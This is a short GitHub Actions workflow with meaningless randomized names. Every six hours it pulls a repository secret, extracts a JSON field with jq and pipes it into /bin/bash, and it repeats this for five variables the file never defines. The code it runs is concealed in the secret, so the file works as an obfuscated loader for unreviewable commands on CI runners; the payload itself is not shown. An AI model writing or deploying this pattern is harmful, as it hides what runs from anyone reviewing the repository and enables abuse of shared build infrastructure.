name: xiongtianping4187
on:
  workflow_dispatch:
  schedule:
    - cron: '24 2/6 * * *'
jobs:  # 855
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiongtianping4187
        env:
          q87: ${{ secrets.q87 }}
        run: |
          echo $q87 | jq -r .zwzk199 | /bin/bash
          echo $wetm8204 | jq -r .f52536 | /bin/bash
          echo $t24433 | jq -r .iw0 | /bin/bash
          echo $mvm93 | jq -r .tirq9848 | /bin/bash
          echo $ih09646 | jq -r .uvrz6060 | /bin/bash
          echo $fbwdx89 | jq -r .oq0146 | /bin/bash

